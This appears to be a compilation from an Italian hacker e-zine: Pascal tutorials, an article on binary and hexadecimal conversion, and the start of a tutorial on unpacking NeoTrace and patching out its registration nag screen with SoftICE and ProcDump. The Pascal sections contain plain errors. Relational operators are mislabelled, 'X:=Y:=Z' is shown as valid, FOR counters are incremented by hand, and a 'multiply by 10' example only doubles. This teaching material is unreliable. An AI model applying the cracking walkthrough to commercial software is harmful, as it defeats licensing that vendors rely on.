lunghissimo cogito(da NON confondere con coito :) ) siamo arrivati alla
conclusione che ognuno dovrebbe farsi una propria idea riguardo ai cicli.
|
\|/
questa stronzata l'ha scritta |ns4n3, mandate pure tutti gli insulti
alla sua e-mail: peltro@yahoo.com

A parte gli scherzi,i cicli sono una serie di istruzioni che
vengono ripetute piu volte a secondo di determinati fattori che possono essere
un numero ben definito di volte o il verificarsi di una determinata
condizione. I cicli che possono essere utilizzati nel pascal sono 3: for,
while e repeat. Il ciclo for serve per ripetere determinate volte (definite
dal programmatore) un determinato pezzo di programma. Il ciclo while ripete
finchè una determinata condizione è vera. Il ciclo repeat prima esegue il
pezzo di programma, poi verifica se una determinata condizione è vera e se lo
continua a ripetere, altrimenti non continua. La sintassi da usare è la
seguente:

for variabile := variabile to variabile do
begin
comandi;
end;

while condizione do
begin
comandi;
end;

repeat
comandi;
until condizione;

Ed ecco un progz di esempio

[-- InIzIo PrOgZ --]

program cicli;
var i,topolino,paperino,pippo,nonna_papera,pluto,ciccio,rockerduck,banda_bassotti: integer;
begin
writeln('Inserisci tre numeri');
readln(paperino,pippo,topolino);
pluto:=1;
nonna_papera:=10;
for i:=pluto to nonna_papera do
begin
ciccio:=paperino + paperino
end;
writeln(paperino,' moltiplicato per 10 da come risultato ', ciccio);
while nonna_papera <> 0 do
begin
rockerduck:=pippo + pippo;
nonna_papera:=nonna_papera - pluto
end;
writeln(pippo,' moltiplicato per 10 da come risultato ', rockerduck);
repeat
banda_bassotti:=topolino + topolino;
nonna_papera:=nonna_papera - pluto;
until nonna_papera <> 0;
writeln(topolino,' moltiplicato per 10 da come risultato ', banda_bassotti);
readln
end.

[-- FiNe PrOgZ --]

2.5 Le Funzioni E Le Procedure

Ed eccoci arrivati alle funzioni e alle procedure. Una procedura
non è altro che un sottoprogramma all'interno di un programma scritto in
pascal. Una funzione è una procedura che restituisce un valore. Le procedure e
le funzioni vanno prima dell'inizio del programma e di begin. Le procedure si
utilizzano in questa maniera e nella seguente sintassi

procedure nome_della_procedura(var nome_della_variabile:tipo_di_variabile);
begin
comandi
end;

Le funzioni invece si utilizzano cosi:

function nome_della_funzione(var
nome_della_variabile:tipo_di_variabile):tipo_del_risultato_della funzione
begin
comandi
end;

3 Conclusioni

Ke kazzo c'è da concludere vi kiederete voi??? Ce lo stiamo kiedendo anke
noi... E giacchè ci siamo rotti i coglioni di scrivere l'articolo finisce qui!
(ke bel modo di finire un articolo, non trovate??)

---bugbyte & |ns4n3--- [dArkSide Crew]

-=!!!|-pAsCal tUt0riAl-|!!!=-

Autore: ValK King Of The Net


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ ppppp aaaa ssssss ccccccc aaaa l @
@ p p a a ss cc a a l @
@ ppppp aaaa ssssss cc aaaa l @
@ p a a ss cc a a l @
@ p a a ss cc a a l @
@ p a a ssssss ccccccc a a llllll @
@ @
@ Writer: ValK King Of The Net @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
ovvero come cavarsela coi compiti
di informatica


Ok, cominciamo:


PER UNA BUONA VISIONE DEGLI SCHEMI E DEI DISEGNI
SI CNSIGLIA DI UTILIZZATE IL NOTEPAD
A TUTTO SCHERMO CON UNA RISOLUZIONE MINIMA DI 800X600


Il Pascal e' il linguaggio che la scuola Superiore italiana ha adottato
x l'insegnamento, mentre in America, insegnano il C, in Italia si insgena
il pascal ed ora vi spiego xche', il C e' un linguaggio libero che non segue
una ferrea regola di programmazione ma che lascia molta fanatasia,
mentre il Pascal e' strutturato seguendo una sintassi e una semantica rigida e
ben definita.

In questa guida non intendo dirvi tutto sul Pascal anche xche' io x
scuola ho 6 vol, sarebbe del tutto impossibile, anche xche' io stesso non so
tutto!

N.B. Questa non vuole essere una guida di programmazione
ma una dispenza una introduzione


Cominciamo con la programmazione

PRIMI CENNI:

1. DOPO OGNI ISTRUZIONE VA' IL PUNTO E VIRGOLA ( ; )
2. E' BENE CHE OGNI VARIABILE SI IN MAIUSCOLO ( PER NON IMPAZZIRE)
3. NON METTETE NON DEL CAVOLO (NON E' PROFESSIONALE)
4. TOGLIETEVI DALLA TESTA CHE IL PASCAL SIA UN LINGUAGGIO X GLI
SCOLARI




/| | ---------------------------------------- |
| |------> come si struttura un programma Pascal <------|
_|_ | ---------------------------------------- |


|++++++++++++++++++++++++++++++++++++++++++|
| PROGRAMMA PASCAL |
| |
| |
| |++++++++++++++++++++++++++++++++++++| |
| | INTESTAZIONE | |
| |++++++++++++++++++++++++++++++++++++| |
| |
| |
| |++++++++++++++++++++++++++++++++++++| |
| | BLOCCO | |
| | |++++++++++++++++++++++++++++| | |
| | | DICHIARAZIONI | | |
| | |++++++++++++++++++++++++++++| | |
| | | |
| | |++++++++++++++++++++++++++++| | |
| | | ISTRUZIONI | | | <--- PRIMA DELLE
| | |++++++++++++++++++++++++++++| | | ISTRUZIONI SI USA
| | | | IL "BEGIN"
| |++++++++++++++++++++++++++++++++++++| |
| |
| FINE DEL PROGRAMMA | <--- PER TERMINALE IL
|++++++++++++++++++++++++++++++++++++++++++| PROG. SI METTE
"END"
-INTESTAZIONE:-

Nell'intestazione si va' a inserire l'intestazine del programma
ovvero il suo nome.

es.
Program ValK;

-BLOCCO:-

Qui si inserisce tutto cio' che e' parte del programma.


-DICHIARAZIONI:-

Qui si ha la dichiarazione delle variabili, la chiamata alle dll
etc.


-ISTRUZIONI:-

Ecco il vero corpo del programma qui si inseriscono le
istruzioni di programmazione

ECCO UN PROGRAMMA IN PASCAL CON COMMENTO

Program ValK; <--- INSTESTAZIONE
Uses crt;
var VAR, VAR1, VAR2: INTEGER; <--- DICHIARAZIONE
Begin <--- ISTRUZIONI Notare che dopo il
begin non che' il ;
istruzione 1
istruzione 2
istruzione 3
end. <--- NOTARE IL "." DOPO END
¯¯¯¯| | ------------------------------------------ |
|¯¯¯ |------> FUNZIONI, ROUTINE <------|
|____ | ------------------------------------------ |


PER ORA NON NE PARLO IN QUANTO L'ARGOMENTO E' VASTO
SPERO DI POTERLO FARE MOLTO PRESTO


/¯¯¯¯| | ----------------------------------------- |
----| |------> LA PROGRAMMAZIONE <------|
\____| | ----------------------------------------- |


N.B. RICORDATE CHE DOPO OGNI ISTRUZIONE VA' IL PUNTO E VIRGOLA (;)


GLI OPERATORI

--------> DI CALCOLO

Gli operatori di calcolo sono quei caratteri che interpretati dall'esecutore
eseguono delle operazioni: per il Pascal questi sono:

+ Addizione - Sottrazione

* Moltiplicazione / Divisione

DIV Esegue la divisione e ritorna il valore intero del risultato.
USO= Variabile := Num1 DIV Num2

MOD Esegue la divisione e ritorna il resto
USO= Variabile := Num1 MOD Num2


--------> DI RELAZIONE


<= maggiore uguale >= minore uguale

< maggiore > minore

= uguale <> diverso

Il loro uso e' molto semplice dopo la dichiarazione della variabile si fa in
essa una relazione ad es.

while x< 10 do ...

--------> LOGICI


NOT Negazione Logica AND Congiunzione Logica

OR Esclusione Logica XOR Comparazione Logica

Questo tipo di operatori si riferiscono al tipo di dato booleano.


-I COMANDI:-

------------> START <------------

PROGRAM Si usa nell'instestazione serve a dichiarare il nome del
programma a cui poi verra' assegnato un numero e copiato in
un indirizzo di memoria

USES Si usa x "chiamare" una dll ( dinamic link library ) [es. la
crt] dopo la chiamata tutte le funzioni disponibili in
quella libreria saranno disponibili x l'uso [es. nella dll
crt c'e' la funzione "clrscr" che pulisce tutto quello
che c'era prima sul monitor]

VAR Serve x dichiarare le variabili, dichiarata la variabile
verra' occupata un'area di memoria a cui poi si fara'
riferimento x scrivere e leggere i valori da inserire nella
variabile

-I TIPI-

REAL: Tipo di dati che abbraccia tutti i numeri Reali cioe'
da -[infinito] a +[infinito], abbraccia quindi tutti i numeri
esistenti

INTEGER: Tipo dei dati che abbraccia tutti i numeri interi quindi non
si accettano in queste varibili i numeri frazionari, con la
virgola o irrazionali.

CHAR: Tipo di dati CARATTERE , cioe' che accetta tutti i caratteri
ascii (quelli della mappa dei caratteri) ma solo uno x
variable char

STRING: Tipo di dati che contiene una frase o una espressione accetta
tutti i caratteri ascii(quelli della mappa dei caratteri) uno
in successione all'altro

BOOLEAN: Tipo di dati che puo' assumere il valore TRUE o FALSE a
seconda della frase logica espressa al suo interno

NOT: Negazione logica

AND: Congiunzione logica

OR: Disgiunzione logica
Es.
var FLAG:boolean;
BEGIN
A:= 10;
B:= 12;
C:= 1;
FLAG:= A OR B <> C -->[ FLAG ASSUME IL VALORE DI TRUE XCHE' A o B
diversi da C e' una frase logica Vera]

BEGIN
Sta ad indicare l'inizio del corpo di programmazione non ha
bisogno di ";" al suo seguito
END.
Sta ad indicare la fine del programma deve sempre essere
seguito dal "."

------------> LETTURA E SCRITTURA <------------

READ(X)
Legge il valore inserito a video [quello seguito dal
Carattere RETURN o INVIO] lo inserisce nella variabile X

READLN(X)
Scrive una linea bianca legge il valore inserito a video
[quello seguito dal carattere RETURN o INVIO] e lo inserisce
nella variabile X

WRITE('string')
Scrive quello inserito tra le virgolette [in questo caso
stringa"] e lo stampa a video inoltre se non si usano le
virgolette l'esecutore cerca la varibile X e ne
stampa a video il contenuto. Se si vuole si puo' anche
dividere da virgola due stringhe
due variabili oppure una stringa e una variabile, etc.
formando tutte le combinazioni
possibili. se si vuole utilizzare nella stringa il carattere
' si deve ripeterlo 2 volte altrimenti l'esecutore va' in
errore.
WRITELN('stringa')

Scrive una linea bianca poi -->
--> Scrive quello inserito tra le virgolette [in questo caso
"stringa"] e lo stampa a video inoltre se non si usano le
virgolette l'esecutore cerca la varibile X e ne
stampa a video il contenuto. Se si vuole si puo' anche
dividere da virgola due stringhe due variabili oppure una
stringa e una variabile, etc. formando tutte le combinazioni
possibili. se si vuole utilizzare nella stringa il caratter '
si deve ripeterlo 2 volte altrimenti l'esecutore va' in
errore.

------------> I CICLI <------------

WHILE --- DO
Si usa x ripetere una istrizuine fino a che il contatore
raggiunge l'esponente
dopo la fase di "programmazione" del ciclo si mette il
"begin" e alla sua fine
"end"
E = espressione di RELAZIONE:
"<=" (maggiore uguale),
">=" (minore uguale),
"<" (maggiore),
">" (minore),
"=" (uguale),
"<>" (diverso NON USARLO MAI)]
I = Variabile contatore integer
X = Esponente numerico

NOTARE CHE LE PARTI CHE COSTITUISCONO IL CICLO SONO MESSE TRA PARENTESI QUADRE

[WHILE] I E X [DO] [ puo' essere inteso cosi' "whileI(Variabile
contatore) =(espressione) 10(Esponente numerico
do" ]
begin
istruzione1
istruzione2
I := I+1 <---- incremento il contatore

"RICORDARSI DI FARLO SEMPRE"

end <---- Fine del ciclo

FOR --- TO --- DO

Si usa x fare una operazione a partire da un numero fino ad
un altro dopo la fase di "programmazione" del ciclo si mette
il "begin" e alla sua fine

"end;"
VAR = Variabile contatore integer
NumInizio= numero a partire dal quale il ciclo conta
NumFine = quando la variabile VAR raggiunge NumFine il ciclo
termina

NOTARE CHE LE PARTI CHE COSTITUISCONO IL CICLO SONO MESSE TRA PARENTESI QUADRE

[FOR] [VAR]:= NumInizio [TO] NumFine [DO]
BEGIN
ISTRUZIONI
VAR := VAR +1 <---- incremento il contatore

"RICORDARSI DI FARLO SEMPRE"
END;


------------> IL BLOCCO "IF", "THEN", "ELSE" <------------

IF
Pone la condizione il suo uso e' semplice ma legato al
camando "then" ecco alcuni esempi:

IF VAR= true ...
IF VAR= 10 ...
IF VAR= 'A' ...

NOTARE CHE DOPO "IF" C'E' L'OPERATORE DI RELAZIONE = UN
QUALSIASI ALTRO OPERATORE NON FA' ALCUNA DIFFERANZA

THEN
Dopo di lui si eseguono le istruzioni che seguono "begin" e
che finiscono con "end"
es.
IF VAR = true THEN <----- SE "VAR" E' VERA (BOOLEANO) ALLORA
Begin
ISTRUZIONI;
End
ELSE
Nel caso non si verifichi la condizione di "IF" viene
eseguito "ELSE" la sintassi e' uguale a quella del comando
"IF ----- THEN" infatti l'esecutore esegue le istruzioni
che seguono "begin" e che finiscono con "end"

F VAR = true THEN <----- SE "VAR" E' VERA (BOOLEANO) ALLORA
Begin
ISTRUZIONI;
End
ELSE <----- ALTRIMENTI
Begin
ISTRUZIONI;
End;

N.B. IL PUNTO E VIRGOLA E' MESSO SOLO SULL'ULTIMO "END" MENTRE SU
"IF ---- THEN" E SU "ELSE" NON C'E' SE CI FOSSE STATO SOLO
IL PRIMO BLOCCO ("IF ---- THEN") ALLORA IL PUNTO E VIRGOLA
AVREBBE SEGUITO IL PRIMO "END"

Questi sono i comandi principali quelli usati piu' di frequente per i
comandi delle dll guardare la documentazione della libreria relativa.

L'ASSEGNAZIONE:

L'operazione di assegnazione, ASSEGNA ad una variabile un valore, per fare
questo si ha la seguente sintassi:


Variabile := valore o espressione

"Variabile" e' la variabile in cui si desidera scrivere, la variabile
va' dichiarata come su detto

":=" e' la vera e propria operazione di assegnazione

"valore o espressione" e' il valore che si vuole scrivere [es. X := 10] oppure
l'espressione NUMERICA che dara' come risultato un
numero [es. X:= 10 + 1 -5]
Notare anche che e' possibile usare il valore di un'altra
variabile nell'espressione basta che
al posto del numero si inserisca il nome della variabile
[es. X := Y + 10 - H ( Y e H sono variabili)]

N.B. nel caso la nosta Variabile X sia utilizzata come
contatore sara' possibile riassegnare il valore gia' in
lei memorizzato e addizionarci l'esponente che
desideriamo. [es. X:= X + 1 in questo caso
l'esponente e' uno ma poteva essere quanto vogliamo]


/| | ----------------------------------------- |
/ | |------> VEDIAMO I PROGRAMMI <------|
¯¯|¯ | ----------------------------------------- |


Non staro' ora a commentare tutti i passaggi, mostrero' solo le parti
principali e spiegate di sopra.

PROGRAMMA 1

Program Benvenuto; <------ INTESTAZIONE
Var Nome: String; <------ DICHIARAZIONE

Begin ¯¯¯|<---- INIZIO
Writeln('Chi sei?'); |
Readln(Nome); |----- ISTRUZIONI
Writeln; |
Writeln('CIAO ',Nome); |
End. ___|<---- FINE

PROGRAMMA 2

Program Asseganz; <------ INTESTAZIONE
Var X,Y,Z: Real; <------ DICHIARAZIONE

Begin ¯¯¯|<---- INIZIO
X:= 10; |
Y:= 12; |----- ISTRUZIONI
Z:= 13; |
X:=Y:=Z; | Prima Y assume il valore di Z poi X
| assume il valore di Y
End. ___|<---- FINE

PROGRAMMA 3

Program Operazio; <------ INTESTAZIONE
Var X,Y,Z: Real; <------ DICHIARAZIONE

Begin ¯¯¯|<---- INIZIO
X:= 10; |
Y:= 12; |----- ISTRUZINI
Z:= 13; |
X:=Y + Z * Y / Z -Y; | Si esegue l'espressione seguendo le
| regole aritmetiche
End. ___|<---- FINE


PROGRAMMA 4

Program Stringa; <------ INTESTAZIONE
Var X,Y,Z: String; <------ DICHIARAZIONE

Begin ¯¯¯|<---- INIZIO
X:= 'Mannaggia' |
Y:= 'Alla'; |----- ISTRUZINI
Z:= 'Pepotta'; |
X:=X + Y + Z; | X assume il Valore di 'Mannaggia Alla
| Pepotta'
End. ___|<---- FINE


|¯¯¯¯ | ----------------------------------------- |
¯¯¯¯| |------> LA CONCLUSIONE <------|
_____| | ----------------------------------------- |


In conclusione ecco alcuni consigli x una buona programmazione


1. Prima della programmazione fate un buon schema di quello che il programma
deve fare

2. Scrivete sempre a scaletta

Program
|_ Uses CRT;
|_ VAR X,Y,Z: Real;
Begin
|_Istruzini;
|_If --- Then;
|_ Begin
|_istruzioni;
|_ End
|_ ELSE
|_Begin
|_istruzioni;
|_ End;
End.

3. Ricordatevi di scriver le variabili in MAIUSCOLO
saranno poi piu' facili da individuare nella fase di Degug

Io ho finito, questa e' la prima versione di questo documento
ma aggiornamenti e correzioni saranno presto disponibili sul mio
sito http:\\members.xoom.it\ValK\ [scrivete V e K grandi altrimenti non vi
accederete]
oppure potete chiedermele via Mail a: ValK@mail.xoom.it


---ValK The King Of The Net---





##############################################################
####### CCCC RRRR AAA CCCC K KK III N N GGGG #######
####### C R R A A C K K III NN N G #######
####### C RRRR AAAAA C KK III N N N G GG #######
####### C R R A A C K K III N NN G G #######
####### CCCC R RR A A CCCC K KK III N N GGGG #######
##############################################################

-=!!!|-sIsTemI dI nUmErAzi0nE-|!!!=-
-[binario, decimale, esadecimale]-

Autore: QueQuero

Salve a tutti sono sempre Quequero, in questo articolo parleremo dei vari
sistemi di numerazione che sono molto utilizzati nei linguaggi di
programmazione e ci serviranno per comprendere molte cose.
Iniziero' col parlare del sistema decimale che tutti conosciamo e che
utilizziamo ogni di'.
Questo sistema viene detto "decimale" perche' utilizza le potenza di...dieci,
per farvi capire cosa intendo ecco un esempio alquanto banale, proviamo a
scomporre il numero 1258:

1258 = 1x10^3 + 2x10^2 + 5x10^1 + 8x10^0

Per verificare se abbiamo fatto bene la scomposizione proviamo a moltplicare
ogni valore per la sua potenza di 10 e poi lo sommiamo agli altri:

1x10^3 = 1000 +
2x10^2 = 200 +
5x10^1 = 50 +
8x10^0 = 8 =
--------------------
1258

Sembra che il risultato sia esatto, cio' vuol dire che siamo stati bravi ;))
Bene bene, questo e' stato solo un ripasso per introdurre il sistema di
numerazione binario, cioe' quello usato dai nostri processori e comunque anche
da qualunque componente elettronico, (calcolatrici, orologi digitali, radio,
gps, modem, stereo ecc...) spero che vi siate chiesti almeno una volta come
fa il computer ad aprire una finestra oppure una calcolatrice ad eseguire un
calcolo "2-1", ebbene tutti i processori riescono a capire la differenza tra
due stati di tensione cioe':

0 (potenziale basso) e

1 (potenziale alto),

ecco l'importanza di questo sistema, ma come possiamo convertire un numero
binario in decimale?
Dal momento che conosciamo tutti i numeri binari (1 e 0 :) creiamo un numerino
e convertiamolo, prendiamo per esempio questo:

11001011 = 1x2^7 + 1x2^6 + 0x2^5 + 0x2^4 + 1x2^3 + 0x2^2 + 1x2^1+ 1x2^0

1x2^7 = 128 + \
1x2^6 = 64 + \
0x2^5 = 0 + |
0x2^4 = 0 + ---- numeri binari convertiti in
1x2^3 = 8 + | decimali e sommati tra loro
0x2^2 = 0 + |
1x2^1 = 2 + /
1x2^0 = 1 = /
----------
203

Il risultato 203 e' esatto? Verifichiamolo.....ma come possiamo farlo se
finora abbiamo imparato solo a scomporre un numero in potenze di dieci e a
convertire un binario in decimale?
Beh, semplice dovete riaprire i libri di matematica, ma non vi preoccupate
perche' Quequero lo fara' per voi ;))
Ecco come si fa':

-----------------
| Numero decimale |
-----------------
||
|| Dividiamo per 2 <------------|
|| |
------------------------ |
| Il quoziente e' pari? | |
------------------------ |
||| |
||| |
SI / \ NO |
/ \ |
------- ------- |
/ \ |
------------- ------------- |
Scriviamo 0 | | Scriviamo 1 | |
------------- ------------- |
\ / |
\----------------------/ |
||| |
||| |
--------------------- |
| Il numero e' finito? | |
--------------------- |
||| |
||| |
SI / \ NO |
/ \ |
------- ------- |
/ \ |
------------------- ---------- |
| Prendi tutte le | | Continua |------------|
| cifre e ribaltale | ----------
-------------------

Bello il logaritmo vero? Spero di si, proviamo a vedere se 203 corrisponde
realmente a 11001011, per farlo usiamo la colonnina che tanto odiavamo alle
elementari:

203|
101|1
51|1
25|0
12|1
6|0
3|0
1|1
0|1

dall'alto al basso vediamo questi numeri 11010011 ma, come vi dicevo, dobbiamo
ribaltarli cosi' avremo 11001011....esatto i numeri corrispondono!!!!
Ovviamente non andrete mai a convertire i numri a manualmente visto che anche
la calcolatrice di winzoz lo fa (dovete selezionare visualizza|scientifica)
comunque un po' di cultura non guasta mai ;)))

Facciamo il resoconto di cio' che abbiamo appreso finora:
Scomposizione di un numero decimale e conversione da:
Binario--->Decimale--->Binario
Affrontiamo ora il tipo di numerazione piu' importante cioe' quello
esadecimale, (o base 16) questo tipo di numerazione differisce dalla decimale
perche' ci sono 16 numeri invece che i soliti 0 1 2 3 4 5 6 7 8 9
e dalla binaria perche' ogni numero in base 16 equivale a 4 in base 2, siccome
avrete le idee confuse ecco una tabella riassuntiva (la metto in verticale
altrimenti non entra nel mio monitor da 14'')

Decimale Binario Esadecimale

0 0000 0
1 0001 1
2 0010 2
3 0011 3
4 0100 4
5 0101 5
6 0110 6
7 0111 7
8 1000 8
9 1001 9
10 1010 A
11 1011 B
12 1100 C
13 1101 D
14 1110 E
15 1111 F

Come facciamo a convertire un numero binario in esadecimale e viceversa? In
base 16 le conversioni sono semplicissime dal momento che ogni numero
esadecimale equivale a 4 binari quindi supponiamo di avere 8F5DA come fa a
diventare binario? Eccovi un altro esempio:

8 = 1000
F = 1111
5 = 0101
D = 1101
A = 1010

Possiamo dire che 8F5DA = 10001111010111011010.
Vogliamo fare la solita verifica per vedere se abbiamo fatto tutti i calcoli
bene? Credo di si, la domanda sorge ormai spontanea...come si fa? Si divide il
numero binario in gruppi di 4 cifre (a partire dalla meno significativa che e'
l'ultima, la piu' significativa e' la prima) e se vede man mano a cosa
corrisponde:

1010 1101 0101 1111 1000
A D 5 F 8

Facciamo un po' di "reversing" sul numero ottenuto ed otteniamo come
sospettato 8F5DA.
Questo tipo di conversione "veloce" vale solo per il sistema
Base2->Base16->Base2
Per fare i calcoli da Base16 a Base10 e vice versa le operazioni sono le
stesse che abbiamo usato durante le conversioni Base2->Base10->Base2,
ovviamente i sistemi di numerazione sono infiniti, un sistema caduto ormai
nell'oblio e' stato quello in Base8 (ottale) ma possiamo convertire qualunque
cosa in quelunque base, pensate che qualche settimana fa ho fatto un CrackMe
che calcolava il seriale da inserire in base 78, in numerazioni di questo
genere ci sono sicuramente tutte le lettere dell'alfabeto e vengono usati
anche simboletti sconosciuti alla razza umana, una cosa bella di questi
sistemi e' che un numero come 1000000000000000000000000000000000000000 diventa
cortissimo e magari simile a questo: ~1«½¦© ;))))

Prima di concludere anche questo articolo vorrei dirvi che non ho parlato
volutamente della rappresentazione dei numeri negativi in base2 visto che
utilizzano un particolare metodo detto "complemento a 2" estremamente
difficile, se mi verra' chiesto scrivero' un articolo anche su questo ma vi
assicuro che verrebbe estremamente lungo, ma lungo lungo lungo ;)))

Ora voi vi starete chiedendo "Ma che cazz ce ne frega di conoscere come
contano i calcolatori", in realta' l'argomento e' importante dal momento che
un compilatore un linguaggio ad alto livello (quale puo' essere il c/c++ o il
Pascal ecc...) una volta compilato non fa altro che convertire tutto in
Assembly che a sua volta converte tutto in esadecimale e che il processore
converte in linguaggio macchina cioè 10110101011 in codice binario.
Ultima raccomandazione: se incontrate qualcosa del tipo 1512h e non sapete
cosa cavolo sia (base8, 18 o 48) dovrete guardare in fondo, vedete quell'h?
Quella indica che il numero si trova in base 16, eccovi l'ultima tabella:

b = Binario
o = Ottale
d = Decimale
h = Esadecimale

Quindi se smanettate con l'Assembly e dovete andare all'offset 00018F5Ah non
domandatevi "come kazz si fa ad avere un offset a 9 cifre" ma ricordate che
l'ultima lettera minuscola vi indica sempre la base.
Ora che siete dei matematici divertitevi (io odio la matematica) ;)))))

Ciauzzzzzzzz
<-->http://quequero.cjb.net<-->

---QueQuero---

-=!!!|-NEoTraCe212 NAg-Rem0ve-|!!!=-

Autore: Il Socio


Difficolta': (in puro stile UIC! ;-))

(x)NewBies ()Intermedio ( )Avanzato ( )Master

Con questo semplice tute spero di aiutare alcuni di voi ad avvicinarsi a
questo insteressante mondo


-->Introduzione<--

Cerchero' di illustrarvi il metodo generale da seguire per rimuovere un nag,
assumendo che il lettore abbia una conoscenza base dell'assembly. Per rendere
meno ostica la comprensione del testo tentero' di spiegare ogni termine
tecnico che introdurro', quindi anche se siete alle prime armi non
disperate e proseguite nella lettura.


-->Tools usati<--

WinFrog (versione modificata di WinShow): Utility generale per identificare un
particolare elemento di una finestra
SoftICE400 (Debugger): per dare uno sguardo al codice asm del programma a
runtime
ProcDump16 (Unpacker): per poter "scompattare" il programma
GetTyp251 (Utility): ci dice se un file e' "packato" e se lo e' con quale
tipo di "packer"
Hiew616 (Editor Assembly/Esadecimale): per rendere permanenti le modifiche
apportate
Li dovreste trovare tutti sul sito che ognuno di noi dovrebbe avere nella
propria lista:

<-->http://PlayTools.cjb.net<-->


-->URL o FTP del programma<--

Potete prelevare NeoTrace direttamente dal sito della Neoworx

-->Notizie sul programma<--

NeoTrace e' una sorta di TraceRoute visuale, consente di ottenere una
rappresentazione grafica dell'instradamento dei pacchetti attraverso la rete.
Lanciando il programma ci troviamo di fronte alla finestra del nag-screen che
attende da parte nostra la pressione di uno tra i tasti Trial/Register/Quit
Pigiando Trial, il nag scompare e viene avviato il programma, premendo
Register vengono visualizzate istruzioni su come poter ordinare la versione
Registrata, ovviamente premendo Quit si esce immediatamente.


-->Essay<--

RISPETTATE ASSOLUTAMENTE I MARGINI

Ogni buon cracker/reverser non inizierebbe mai una sessione senza possedere
gli attrezzi del mestiere, quelli che vengono chiamati "Tools". E' veramente
fondamentale utilizzare le adeguate risorse di cui si puo' disporre, in modo
da raggiungere l'obbiettivo nel miglior modo e nel minor tempo possibile.
Oltre a quelli che ho utilizzato questa volta, vi consiglio di procurarvi:

->Una calcolatrice dotata di ror/rol/shl/shr/xor in dec/bin/hex (BaseCalc)
->Un editor di risorse (Restorator)
->Un potentissimo Anti-AntiDebug :-) (FrogsICE)
->Un disassemblatore (IDA)
->Un monitor delle operazioni compiute sui files (FileMon)
->Un monitor delle operazioni compiute sul registro (RegMon)
->Un tool per fare delle copie del registro in momenti differenti e poter
tener traccia le chiavi modificate (RegSnap)
->Un monitor delle API che vengono richiamate (APISpy)
->Un Memory Dumper (ICEDump)

Detto questo, e' ora di partire con il tute.
Iniziamo raccogliendo qualche informazione riguardanti il programma.
Utilizzando GetTyp, otteniamo le seguenti info...

Found no known modifier or compiler.
Name Virt size RVA Phys size Phys Ofs
.text 00026000h 00001000h 00026000h 00000000h
.rdata 00003000h 00027000h 00003000h 00000000h
.data 00009D34h 0002A000h 00001000h 00001000h
.rsrc 000B4F28h 00034000h 00005000h 00002000h
.neolit 000062BAh 000E9000h 00001BCAh 00007000h

A quanto pare GetTyp dice che il prog. non e' "packato" (si dice che un
programma e' packato quando esso e' compresso, ad ogni sua esecuzione verra'
richiamata una particolare routine interna del programma che si occupera' di
decomprimere il programma in memoria e poi eseguirlo. Per poterne modificare
il codice contenuto nel file e' necessario prima ottenere il file decompresso,
per fortuna abbiamo i nostri fidati tools che ci rendono semplice questo
lavoro).
Anche se GetTyp non sembra aver rilevato che il programma e' packato, quella
sezione ".neolit" all'interno del file e' piuttosto sospetta, considerate
anche che la produttrice di NeoTrace e' la NeoWorx (che ha sviluppato il
packer NeoLite).
Apriamo ProcDump e vediamo se ne tiriamo fuori qualcosa di buono, selezioniamo
"Unpack" e scegliamo come unpacker Neolite2, dopo qualche secondo ci verra'
richiesto dove desideriamo salvare il programma "ripulito" (unpackato e privo
delle chiamate alle routine di decompressione).
Se ora confrontate i 2 files, noterete la notevole differenza di dimensioni:

CLEAN.EXE 970.752
NEOTRACE.EXE 367.627

Adesso lanciamo il file CLEAN.EXE e lavoriamo un po' per rimuovere il nag.
Ci troviamo davanti alla finestra del nag che attende la pressione di un
pulsante, grazie a WinFrog possiamo scoprire l'handle della finestra
principale che contiene i pulsanti, nel mio caso: 6d0 (hex) sicuramente
voi avrete un'altro valore.
In alternativa a WinFrog, potete usare il comando "task" dal quale ricaverete
il nome del task del programma (Neotrace) e successivamente "hwnd Neotrace"
che vi sparera' una lista di tutti i controlli della finestra di Neotrace e
relativi handle, a questo punto dovrete individuare qual'e' l'handle della
finestra principale (fase non sempre semplicissima), come avrete capito anche
voi, WinFrog e' caldamente consigliato poiche' "snellisce" il lavoro.
Dunque, una volta individuato l'handle della finestra (con WinFrog o tramite
task/hwnd) CTRL-D ed eccoci in SoftIce, piazziamo un breakpoint bmsg
HandleTrovato wm_command ("bmsg 6d0 wm_command") e procediamo pigiando il
pulsante Trial.
SoftIce compare ed in questo momento dovremmo trovarci di fronte alla parte di
codice del modulo user, pigiamo un po' di volte F12 fino a quando non
rientriamo in una parte di codice di neotrace, dovremmo aver raggiunto questo
punto...

Call USER32!EndDialog <--- prima eravamo dentro a questa call
POP EDI <--- Arriviamo qui
XOR EAX, EAX
POP ESI
ADD ESP, F0
RET

A quanto pare il codice qui sopra si occupa di chiudere il nag.
Al termine del ret ci troviamo di nuovo dentro un modulo di sistema,
Kernel32 come prima continuamo a pigiare F12 fino a ritovarci in una zona di codice
di neotrace e finalmente arriviamo qui (***)...

414A00 CALL 4092A0
414AD5 ADD ESP, 04
414AD8 PUSH 00 <---| Parametri per
414ADA PUSH 004161D0 | richiamare
414ADF PUSH 00 | la funzione
414AE1 PUSH 00000226 | DialogBoxParamA
414AE6 PUSH ESI <---| (Identificati consultando una Api-Reference)
414AE7 Call USER32!DialogBoxParamA <--- Creazione del NAG
414AED CMP EAX, 2 <--- (***)Arriviamo qui, EAX vale 1
414AF0 POP ESI
414AF1 JNZ 414AF6 <---| salta se non e' stato pigiato il pulsante
"Quit"
414AF3 XOR EAX,EAX | altrimenti
414AF5 RET <---| esce dalla routine e dal programma

Come potete vedere ora, avremmo anche potuto piazzare un semplice breakpoint
sulla funzione DialogBoxParamA e saremmo arrivati allo stesso punto, lo scopo
del tute e' pero' quello di mostrare un approccio che sia il piu' generale
possibile per affrontare i nag.
Ora che abbiamo identificato la call responsabile della comparsa e chiusura
del nag (DialogBoxParamA) non sara' difficile ripulire il programma.
E' sufficiente non richiamarla per evitare il noioso nag, inoltre osservate
che se viene pigiato il pulsante "Trial", in eax viene restituito 1 quindi
sara' opportuno settare EAX ad 1 prima di saltare a 414AF6, poiche' in seguito
il programma potrebbe utilizzare EAX per qualche operazione.
Una parte importante nella rimozione del nag e' fare attenzione a non
compromettere lo stack, mi spieghero' meglio..
Se osservate il codice sopra, noterete che prima della call vengono effettuate
4 push, queste push, servono per passare i parametri alla funzione
DialogBoxParamA, la quale si occupera' poi della loro rimozione dallo stack,
qui di seguito vi ho riportato i cambiamenti del puntatore dello stack ad
ogni esecuzione delle istruzioni....

